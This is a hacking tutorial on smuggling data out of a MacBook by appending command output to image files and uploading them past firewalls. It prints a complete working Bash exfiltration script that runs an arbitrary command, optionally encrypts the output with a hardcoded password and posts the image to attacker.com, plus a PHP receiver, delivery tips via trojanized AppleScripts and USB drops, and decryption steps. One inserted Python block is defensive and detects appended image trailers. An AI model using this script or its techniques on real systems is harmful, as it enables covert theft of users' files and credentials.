Hacking macOS: How to Use Images to Smuggle Data Through Firewalls

Data can be injected into images quickly without the use of metadata tools. Attackers may use this knowledge to exfiltrate sensitive information from a MacBook by sending the pictures to ordinary file-sharing websites.

Continuing on the topics of DPI evasion, payload obfuscation, and utilizing popular websites to bypass firewalls, we'll be looking at an alternative way of embedding data into images. Unlike using metadata tags to store payloads inside an image, this method involves injecting text directly into the footer of the image file.

Understanding the Attack

A simple Bash script was created for this article to demonstrate how an attacker can easily exfiltrate data inside images found on a target Mac computer. The script is below and available on my GitHub as well.

#!/bin/bash

# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attacker's PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating from the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the user's home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
  # Curl will silently (-s) download the backup image and
  # save it (-o) into the /tmp directory with the i.jpg filename.
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  # The backup image is set into the exfilImage variable for
  # later commands.
  exfilImage="/tmp/i.jpg"
else
  # If a suitable image is discovered, the exfilImage variable
  # is set for later commands.
  exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='1'

# An `if` statement to determine the value of the useEncrypt
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
  # OpenSSL is used to encrypt (enc) the payload output
  # as well as encode (-a -A) the encrypted data with a
  # password (-pass).
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluate the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into the
# image. It will append (>>) the data after two newlines (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will exfiltrate the image to the attacker's PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"

The script will first execute an arbitrary command (e.g., system_profiler). The output of that command is the data the attacker wishes to exfiltrate. The script will then attempt to locate a JPEG or PNG image in the target's home (~/) directory and inject the output of the command directly into the picture. The image is then immediately uploaded (smuggling the data) to any website the attacker desires.

Below is an example of a small image file opened with the nano text editor in Kali. We can see the image produces some unusual characters as photos aren't meant to be opened with text editors.

Scrolling down to the very bottom of the same file, we'll find what appears to be the output of some ls and system_profiler commands.

total 80
drwx------+ 19 user  staff   608B May  3 02:22 Desktop
drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
-rw-------   1 user  staff    55B May  3 01:00 .lesshst
drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
-rw-------   1 user  staff    23K May  2 22:17 .bash_history
-rw-r--r--@  1 user  staff   8.0K May  2 22:11 .DS_Store
drwx------   7 user  staff   224B Apr 28 06:46 .Trash
drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
drwx------@ 55 user  staff   1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
drwx------   3 user  staff    96B Nov 18 05:51 .config
drwx------+  3 user  staff    96B Oct 29  2018 Movies
drwx------+  3 user  staff    96B Oct 29  2018 Music
drwx------+  3 user  staff    96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

Firewall:

    Firewall Settings:

      Mode: Allow all incoming connections
      Firewall Logging: Yes
      Stealth Mode: No

The technical details of how images can retain data are a bit beyond the scope of this article. What's important is that the data found at the bottom of the picture doesn't corrupt the photo. Image viewers like Apple's Preview will continue to open the image without detecting data in the file. It also makes images an excellent transport mechanism for data exfiltration.

The script accomplishes the injection of data into the image file using I/O redirection. The very same way it's possible to append (>>) data to a text file, the script will append the command output into the bottom of the image file.
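For defenders, the same property gives a reliable check: a PNG ends at its IEND chunk and a JPEG at its EOI marker, so any bytes after that point were added later. The following is an added example, not part of the original article or the author's script; it goes beyond the PNG shown here to cover JPEG as well, and the function names, sample images and trailers are constructed for illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_end(data):
    """Offset just past the IEND chunk, found by walking the chunk list."""
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length                 # length + type + body + CRC
        if ctype == b"IEND" and pos <= len(data):
            return pos
    raise ValueError("no complete IEND chunk")

def jpeg_end(data):
    """Offset just past EOI; skips entropy-coded data (FF 00 and RSTn) after SOS."""
    pos, n = 2, len(data)                  # start after SOI (FF D8)
    while pos + 1 < n:
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte before a marker
            pos += 1
        elif marker == 0xD9:               # EOI
            return pos + 2
        elif marker == 0x01 or 0xD0 <= marker <= 0xD7:
            pos += 2                       # markers with no length field
        else:
            pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")
            while marker == 0xDA and pos + 1 < n and (
                    data[pos] != 0xFF or data[pos + 1] == 0x00
                    or 0xD0 <= data[pos + 1] <= 0xD7):
                pos += 1
    raise ValueError("no EOI marker")

def inspect_image(data):
    """Return (format, trailer_size, kind) for PNG or JPEG bytes."""
    if data.startswith(PNG_SIG):
        fmt, end = "png", png_end(data)
    elif data.startswith(b"\xff\xd8"):
        fmt, end = "jpeg", jpeg_end(data)
    else:
        raise ValueError("not a PNG or JPEG")
    body = data[end:].strip()
    if not body:
        kind = "clean"
    elif body.startswith(b"U2FsdGVkX1"):   # base64 of "Salted__" (openssl enc -a)
        kind = "openssl-base64"
    else:
        printable = all(32 <= b < 127 or b in (9, 10, 13) for b in body)
        kind = "text" if printable else "binary"
    return fmt, len(data) - end, kind

def make_chunk(ctype, body=b""):
    crc = zlib.crc32(ctype + body)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)

# Constructed samples: a 1x1 grayscale PNG, a JPEG marker skeleton, two trailers.
CLEAN_PNG = (PNG_SIG + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + make_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + make_chunk(b"IEND"))
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x04JF\xff\xda\x00\x03\x00\x12\xff\x00\x34\xff\xd0\x56\xff\xd9"
TEXT_TRAILER = b"\n\ntotal 80\n-rw-------   1 user  staff    55B May  3 01:00 IEND.txt"
ENC_TRAILER = b"\n\nU2FsdGVkX1+AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
```

Walking the chunk or segment structure, rather than searching for the last IEND or FF D9, keeps the check from being fooled by a trailer that contains those bytes itself.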

Why Exfiltrate Data Inside Images?

The primary benefit of exfiltrating data this way is firewall evasion. With network-based firewall solutions, it's possible to observe every packet leaving a particular device on the network. Strict firewall policies make it difficult for an attacker to get large quantities of information out of the network. Smuggling data inside images helps solve this obstacle.

Wireshark capture of an image containing exfil data being sent to an arbitrary website.

Understanding the Payload

Let's break down the script, line by line.

It starts with several variables that should be changed appropriately to fit the scenario. The first variable will determine which command(s) get executed on the target MacBook. The output of the command is embedded in the image file. The below example executes a simple ls command of the target's home directory. Single-quotes are used for this variable to help with escaping characters. Be mindful of this when coming up with commands to execute.

exfilData='ls -lah "/Users/$USER/"'

There are many places the image can be exfiltrated to. With websites like Dropbox and Flickr, official APIs exist to make file uploading as convenient as possible for an end-user (and the attacker). Similarly, curl can emulate POST requests, sending the image to file-sharing websites and other forums. For this demonstration, we'll use a simple PHP server set up on the attacker's system.

exfilSite="http://attacker.com/index.php"

As we'll see later in the script, it attempts to enumerate a viable image to save the output data into. However, if none are discovered, the script will download the below image, using it to smuggle the output data instead. The below URL links to a random image on one of Apple's domains, but can be literally any JPEG or PNG on the internet.

tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

The script will try to find an image file (-type f) smaller than 100k with a JPEG, JPG, or PNG file extension. It will use the first (-print -quit) image matching these criteria as the exfiltration file. The file size requirement is mostly arbitrary; smaller image files make the uploading process quicker. These find options were included mainly to show how the criteria can be refined.

findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

The script supports the ability to encrypt the command output data before it's embedded into the image. Enable it with 1, disable it with 0.

useEncrypt='1'

With encryption enabled, the below password is used to password-protect the output data. It's hardcoded into the payload for convenience, which makes it possible to reverse engineer the payload and decrypt the exfiltrated data inside the image, but it is meant to act as a quick and dirty solution. Public-key cryptography would make more sense here.

pass="password123"

The remainder of the script doesn't need to be modified. All of the above variables are hardcoded into the below sections.

Below is the first of two if statements, which will determine whether or not a suitable JPEG or PNG file was detected and either use it in the following commands or download the Apple image defined in the "tmpImage" variable.

if [[ ! -f "$findImage" ]]; then
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  exfilImage="/tmp/i.jpg"
else
  exfilImage="$findImage"
fi

The second if statement uses OpenSSL (LibreSSL in macOS or Mac OS X) to encrypt the output data with the $pass variable password. Otherwise, it skips encryption and injects the output data into the image in plaintext.

if [[ "$useEncrypt" = '1' ]]; then
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  exfilData="$(eval $exfilData)"
fi

Here, we have the I/O redirection. Printf is used to append (>>) the command output to the image file. Newlines (\n\n) are added to separate the injected data from the raw image data, making it easier to extract in the following commands.

printf '\n\n%s' "$exfilData" >> "$exfilImage"

Finally, the image is exfiltrated to the attacker's server using curl with the -F option to send the image.

curl -F "image=@$exfilImage" "$exfilSite"

Step 1: Start the PHP Server

The example used earlier in this article utilizes File.io to store the exfiltrated image(s). While similar file-sharing websites are ideal for this attack, I'll quickly show how to use a local PHP server in Kali to intercept images.

Much like preparing a server for screenshot exfiltration, PHP is used to intercept images coming from the target's MacBook. It's covered in depth in that guide, so be sure to reference that for the setup details.

Save the below PHP code to a file called "index.php" and start the server with php -S 0.0.0.0:80.

<?php
    $file = date("dHis") . ".png";
    move_uploaded_file($_FILES['image']['tmp_name'], $file);
?>

Step 2: Deploy the Payload

There are several ways of getting a Mac user to execute some nefarious code. The simplest method for compromising a target involves social engineering them into opening trojanized AppleScripts. That can be accomplished by performing USB dead drop attacks, which macOS is highly susceptible to, or remotely bypassing Gatekeeper.

Trojanized application made to appear as an ordinary PDF.

For more on the subject of USB dead drops, check out our article on hacking Wi-Fi passwords using USB dead drops. It focuses on compromising Windows 10 targets but talks in-depth about using USB flash drives as attack vectors.

Step 3: Access the Exfiltrated Data

After the PHP server receives the exfiltrated image, extract the embedded data. If encryption is disabled in the payload, the exfiltrated data is easily extracted using the tail command. Change the number (-n) of lines to print as needed.

~$ tail -n 20 image.png

1   ���g�@�nݬ�֯_X�bE@�E"�H�p6o@@@@�&��oZ�6dȐ���{����

��J*6+X"    �@��p8�r�J�j8���m�F_�dr��p��PW�B@@@@����Mö�     ��!\rX@@@@�!��`    �@   ,�E@@@@�        ��!\rX@@@@�!��`    �@   ,�E@@@�q��`���1�
F��C寻i�@@@@Z$�V·yR��Ϲs�>*{&�@��q�2��IEND�B`�          ]����u�n3�pR7/�H$f���*�� ���S�@@@@��h ��/_x�w,

     2  total 80
     3  drwx------+ 19 user  staff   608B May  3 02:22 Desktop
     4  drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
     5  -rw-------   1 user  staff    55B May  3 01:00 .lesshst
     6  drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
     7  -rw-------   1 user  staff    23K May  2 22:17 .bash_history
     8  -rw-r--r--@  1 user  staff   8.0K May  2 22:11 .DS_Store
     9  drwx------   7 user  staff   224B Apr 28 06:46 .Trash
    10  drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
    11  drwx------@ 55 user  staff   1.7K Apr 25 06:58 Library
    12  drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
    13  drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
    14  drwx------   3 user  staff    96B Nov 18 05:51 .config
    15  drwx------+  3 user  staff    96B Oct 29  2018 Movies
    16  drwx------+  3 user  staff    96B Oct 29  2018 Music
    17  drwx------+  3 user  staff    96B Oct 29  2018 Pictures
    18  drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
    19  drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

If encryption is enabled, OpenSSL (LibreSSL) must be installed in Kali to decrypt the data. Be sure to install LibreSSL version 2.8. In my test, version 2.9.x didn't seem to be compatible with Mojave's version of LibreSSL; the data wouldn't decrypt.

In Kali, start by downloading the LibreSSL tarball.

~$ wget 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz'

--2019-04-28 21:08:46--  https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz
Resolving ftp.openbsd.org (ftp.openbsd.org)... 129.128.5.191
Connecting to ftp.openbsd.org (ftp.openbsd.org)|129.128.5.191|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3373599 (3.2M) [text/plain]
Saving to: ‘libressl-2.8.2.tar.gz’

libressl-2.8.2.tar.gz             100%[==============>]   3.22M   255KB/s    in 25s

2019-04-28 21:09:15 (133 KB/s) - ‘libressl-2.8.2.tar.gz’ saved [3373599/3373599]

Decompress it with the following tar command to extract (x) the .gz (z) file (f).

~$ tar -xzf libressl-*.tar.gz

libressl-2.8.2/m4/check-hardening-options.m4
libressl-2.8.2/m4/check-libc.m4
libressl-2.8.2/m4/check-os-options.m4
libressl-2.8.2/m4/disable-compiler-warnings.m4
libressl-2.8.2/m4/libtool.m4

...

libressl-2.8.2/man/tls_load_file.3
libressl-2.8.2/man/tls_ocsp_process_response.3
libressl-2.8.2/man/tls_read.3
libressl-2.8.2/man/openssl.cnf.5
libressl-2.8.2/man/x509v3.cnf.5
libressl-2.8.2/man/Makefile.in
libressl-2.8.2/man/CMakeLists.txt

When that's done, change (cd) into the new libressl-*/ directory.

~$ cd libressl-*/

Use the ./configure command to ensure everything is ready to build the application. It will take a few minutes to complete.

~$ ./configure && make

checking build system type... x86_64-pc-linux-gnu
checking host system type... x86_64-pc-linux-gnu
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usr/bin/mkdir -p

...

make[1]: Entering directory '/opt/libressl-2.8.2/man'
make[1]: Nothing to be done for 'all'.
make[1]: Leaving directory '/opt/libressl-2.8.2/man'
make[1]: Entering directory '/opt/libressl-2.8.2'
make[1]: Nothing to be done for 'all-am'.
make[1]: Leaving directory '/opt/libressl-2.8.2'

Then, use make install to install the necessary software into the appropriate system directories.

~$ make install

make install
Making install in crypto
make[1]: Entering directory '/opt/libressl-2.8.2/crypto'
make  install-am
make[2]: Entering directory '/opt/libressl-2.8.2/crypto'

...

make[2]: Nothing to be done for 'install-exec-am'.
 /usr/bin/mkdir -p '/usr/local/lib/pkgconfig'
 /usr/bin/install -c -m 644 libcrypto.pc libssl.pc libtls.pc openssl.pc '/usr/local/lib/pkgconfig'
make[2]: Leaving directory '/opt/libressl-2.8.2'
make[1]: Leaving directory '/opt/libressl-2.8.2'

Finally, use the ldconfig command to create the necessary links and cache to the most recent shared libraries.

~$ ldconfig

To verify the installation was successful, use the whereis command to find the openssl binaries.

~$ whereis openssl

openssl: /usr/bin/openssl /usr/local/bin/openssl /usr/share/man/man1/openssl.1ssl.gz

The binary in /usr/local/bin/ is the newest version and can be verified using the below openssl command.

~$ /usr/local/bin/openssl version

LibreSSL 2.8.2

With the installation taken care of, the data in the image can be extracted and decrypted using the below command.

~$ /usr/local/bin/openssl enc -d -aes-256-cbc -a -A -pass pass:password123 -in <(tail -n1 image.png)

total 80
drwx------+ 19 user  staff   608B May  3 02:22 Desktop
drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
-rw-------   1 user  staff    55B May  3 01:00 .lesshst
drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
-rw-------   1 user  staff    23K May  2 22:17 .bash_history
-rw-r--r--@  1 user  staff   8.0K May  2 22:11 .DS_Store
drwx------   7 user  staff   224B Apr 28 06:46 .Trash
drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
drwx------@ 55 user  staff   1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
drwx------   3 user  staff    96B Nov 18 05:51 .config
drwx------+  3 user  staff    96B Oct 29  2018 Movies
drwx------+  3 user  staff    96B Oct 29  2018 Music
drwx------+  3 user  staff    96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

The payload (ls) used in this article is an elementary example. In a real scenario, an attacker may design the script to locate and exfiltrate LastPass and 1Password data for offline brute-force attacks. Other exfiltration attacks may involve cached browser passwords, Terminal history, web traffic, and any data the attacker deems worthy of stealing.

For questions and concerns, leave a comment below or perform open source intelligence gathering to locate my email address. If all else fails, message me on Twitter @tokyoneon_.

Cover photo and screenshots by tokyoneon/Null Byte
